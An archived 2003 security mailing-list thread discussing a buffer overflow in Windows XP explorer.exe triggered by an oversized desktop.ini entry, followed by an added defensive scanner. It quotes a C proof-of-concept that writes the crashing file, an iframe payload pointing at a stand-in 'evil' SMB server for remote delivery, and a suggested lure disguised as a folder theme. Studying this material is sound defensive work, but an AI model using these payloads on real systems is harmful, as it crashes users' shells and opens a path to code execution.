Vulnerability Development mailing list archives
Re: Buffer overflow in Explorer.exe
From: Kris Matthews <krism () mailsnare net>
Date: 11 May 2003 16:39:24 -0400
I have been unable to reproduce it in this fashion; my quick-and-dirty guess is that explorer.exe does not attempt to interpret that file for remote (smb/etc) shares. However, if you do it from a _local_ share.... It still blows up quite nicely. :)

Regards,
Kristopher

On Sun, 2003-05-11 at 13:55, Berend-Jan Wever wrote:
Could this not be done remotely without user interaction except browsing an evil website by using SMB?

<HTML><BODY> <IFRAME src="\\my-evil-server\"> </BODY></HTML>

You can make IE browse a harddisk whose contents you control... I don't have XP so I can't test this. Let me know what you find.

Cheers,
Berend-Jan Wever

----- Original Message -----
From: "Kristopher Matthews" <krism () mailsnare net>
To: "'Ryan Yagatich'" <ryany () pantek com>
Cc: <vuln-dev () securityfocus com>
Sent: Friday, May 09, 2003 18:42
Subject: RE: Buffer overflow in Explorer.exe

I have tested and duplicated this behavior on a fully patched/updated Windows XP Pro system.

1. The overflow is for that particular key, AFAICT.
1a. It will not work for the root (c:/) directory; explorer.exe does not parse 'desktop.ini' for that directory. It will, however, work for any other directory.
2. It crashes explorer.exe (which runs the task bar/start menu, etc). It looks for all the world like a standard buffer overflow; I believe a more carefully crafted 'desktop.ini' file could cause explorer.exe to unintentionally execute arbitrary code.
3. Download and execute untrusted code? Combine this with any of the other popular exploits for windows; also, it wouldn't be terribly hard to get a user to download a 'desktop.ini' file to their "My Documents" directory (in the guise of, say, a folder theme, which windows does support; e.g. different background, file layout, etc); bam, whenever they open that directory, explorer crashes.

Regards,
Kristopher

-----Original Message-----
From: Ryan Yagatich [mailto:ryany () pantek com]
Sent: Thursday, May 08, 2003 6:28 PM
To: at4r () 3wdesign es
Cc: vuln-dev () securityfocus com

Hi,

I don't quite understand the purpose behind this code. It creates a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the contents of

[.ShellClassInfo]
AAAAAAAAAAAA {x2301}

And then terminates?

I don't have a windows machine available to really explore this any, but what makes that entry in desktop.ini cause this? Furthermore, is this issue only for that particular key, or is it generally just key/excessive parameter/missing value size that is affected? And additionally, you mention that explorer will no longer be able to operate when trying to browse the hard disk, but does this mean globally, or when they try to browse the c:/ drive, or just that particular folder? Please send me more information about this (even if it references past posts that I have missed) so that I can better understand the severity of this. Especially since to me, I still see it as someone needing to download and execute untrusted software which causes a system crash, and if that were going to happen there are far worse things that can be done besides creating a small text file.

Thanks,
Ryan Yagatich

,_____________________________________________________,
\ Ryan Yagatich                     support () pantek com \
/ Pantek Incorporated                    (877) LINUX-FIX /
\ http://www.pantek.com/security          (440) 519-1802 \
/ Are your networks secure? Are you certain?             /
\___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\

On Wed, 7 May 2003, aT4r InsaN3 wrote:

This bug allows a malicious attacker to execute data with the privileges of a user that is browsing the hard disk with explorer. Tested against winxp SP1, example code provided.

<snip>
strcpy(path,"\\aT4r[at]3WDesign.es Security");
mkdir(path);
SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
strcat(path,"\\desktop.ini");
bof=fopen(path,"w");
fputs("[.ShellClassInfo]\n",bof);
memset(evil,'A',BUFF);
fputs(evil,bof);
fclose(bof);
<snip>
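A defender-side check prompted by the thread above: Kristopher notes that a dropped 'desktop.ini' in a user folder crashes explorer, and Ryan asks whether it is a particular key or simply oversized content, so the scanner below flags any over-long line inside [.ShellClassInfo] rather than a specific key. This is an added example, not code from any poster; the 260-character threshold (MAX_PATH) is an assumption about what legitimate folder-theme values look like, not a documented desktop.ini limit.

```python
"""Scan for desktop.ini files whose [.ShellClassInfo] section holds an
oversized line, the shape of the crash described in the thread above."""
import os
import sys

# Assumed threshold: legitimate .ShellClassInfo values (IconFile=,
# InfoTip=, ...) are short paths or strings; MAX_PATH is a generous cap.
MAX_SANE_LEN = 260


def oversized_shellclassinfo_lines(text, limit=MAX_SANE_LEN):
    """Return (line_number, length) for every line inside the
    [.ShellClassInfo] section longer than `limit`. Bare runs (as in the
    PoC) and key=value lines are both counted; other sections are ignored."""
    hits = []
    in_section = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[.shellclassinfo]"
            continue
        if in_section and len(line) > limit:
            hits.append((lineno, len(line)))
    return hits


def read_ini(path):
    """Read an INI file; Explorer may write desktop.ini as UTF-16 with a BOM."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(b"\xff\xfe") or data.startswith(b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")


def scan_tree(root, limit=MAX_SANE_LEN):
    """Walk `root` and return {path: hits} for each suspect desktop.ini."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            try:
                hits = oversized_shellclassinfo_lines(read_ini(path), limit)
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


# Constructed samples: a benign folder theme and the PoC's 2301-byte line.
BENIGN = "[.ShellClassInfo]\nIconFile=%SystemRoot%\\system32\\shell32.dll\nIconIndex=3\n"
POC = "[.ShellClassInfo]\n" + "A" * 2301 + "\n"

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~")
    for path, hits in scan_tree(root).items():
        for lineno, length in hits:
            print(f"{path}: line {lineno} is {length} chars")
```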
Current thread:
- Buffer overflow in Explorer.exe aT4r InsaN3 (May 08)
- Re: Buffer overflow in Explorer.exe Ryan Yagatich (May 09)
- RE: Buffer overflow in Explorer.exe Kristopher Matthews (May 09)
- Re: Buffer overflow in Explorer.exe Berend-Jan Wever (May 11)
- Re: Buffer overflow in Explorer.exe Kris Matthews (May 12)
- RE: Buffer overflow in Explorer.exe Kristopher Matthews (May 09)
- Re: Buffer overflow in Explorer.exe Ryan Yagatich (May 09)
- <Possible follow-ups>
- Re: Buffer overflow in Explorer.exe aT4r InsaN3 (May 09)